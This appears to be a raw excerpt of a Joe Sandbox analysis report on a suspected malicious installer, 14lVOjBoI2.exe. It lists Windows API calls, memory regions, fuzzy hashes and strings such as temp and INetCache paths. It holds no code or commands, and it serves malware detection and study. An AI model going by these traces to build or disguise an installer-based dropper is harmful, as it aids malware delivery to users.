                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3850602802-0
                                                                                                          • Opcode ID: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                          • Instruction ID: f9280d834dafdcf82d79e279d22eccff0cbc279b2038abc2a2984d0c0ecbec1f
                                                                                                          • Opcode Fuzzy Hash: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                          • Instruction Fuzzy Hash: E3B01235180A00BBDE114B00EE09F857E62F7EC701F018438B340240F0CBB200A0DB08
                                                                                                          APIs
                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FilePointer
                                                                                                          • String ID:
                                                                                                          • API String ID: 973152223-0
                                                                                                          • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                          • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                                                          • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                          • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                                                          APIs
                                                                                                          • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2128913504.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2128848115.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2128967473.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2129045974.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10000000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocGlobal
                                                                                                          • String ID:
                                                                                                          • API String ID: 3761449716-0
                                                                                                          • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                          • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                                          • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                          • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                          • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405440
                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                            • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                          • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004054F1
                                                                                                          • ShowWindow.USER32(00000008), ref: 0040553B
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                          • CreatePopupMenu.USER32 ref: 00405580
                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                          • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                          • EmptyClipboard.USER32 ref: 0040561B
                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                          • CloseClipboard.USER32 ref: 00405676
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                          • String ID: {
                                                                                                          • API String ID: 590372296-366298937
                                                                                                          • Opcode ID: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                          • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                          • Opcode Fuzzy Hash: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                          • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                          • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 0040471B
                                                                                                          • lstrcatW.KERNEL32(?,Call), ref: 00404727
                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                            • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                            • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\14lVOjBoI2.exe",76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                            • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                            • Part of subcall function 004062E9: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\14lVOjBoI2.exe",76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                            • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                          • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                            • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                            • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                            • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                          • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$Call
                                                                                                          • API String ID: 2624150263-922056177
                                                                                                          • Opcode ID: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                          • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                          • Opcode Fuzzy Hash: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                          • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                          APIs
                                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                          • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2128913504.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2128848115.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2128967473.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2129045974.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10000000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$Free$lstrcpy$Alloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 4227406936-0
                                                                                                          • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                          • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                          • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                          • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                          • Instruction ID: 1644c94297a6e2d1b4e9f0aeee9f0c77f66fc5de92a1577942f5ef847e7267c5
                                                                                                          • Opcode Fuzzy Hash: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                          • Instruction Fuzzy Hash: 8DE17A7190070ADFDB24CF58C890BAAB7F5FB45305F15892EE497A7291D738AAA1CF04
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                          • Instruction ID: 4e7e9ca0714fd30891db9328173e30945d26479923c7842d5bcb9add60bdfbdd
                                                                                                          • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                          • Instruction Fuzzy Hash: 4BC14931E04219DBDF18CF68C4905EEB7B2BF98314F25826AD8567B384D7346A42CF95
                                                                                                          APIs
                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                          • GetSysColor.USER32(?), ref: 00404396
                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                          • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                          • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                          • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                          • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                          • String ID: -B@$Call$N$open
                                                                                                          • API String ID: 3615053054-1446803726
                                                                                                          • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                          • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                          • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                          • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                          APIs
                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                          • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                          • String ID: F
                                                                                                          • API String ID: 941294808-1304234792
                                                                                                          • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                          • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                          • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                          • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                          APIs
                                                                                                          • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                          • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                            • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                            • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                          • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                          • wsprintfA.USER32 ref: 00405DFB
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                          • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                            • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\14lVOjBoI2.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                            • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                                                                          • API String ID: 222337774-899692902
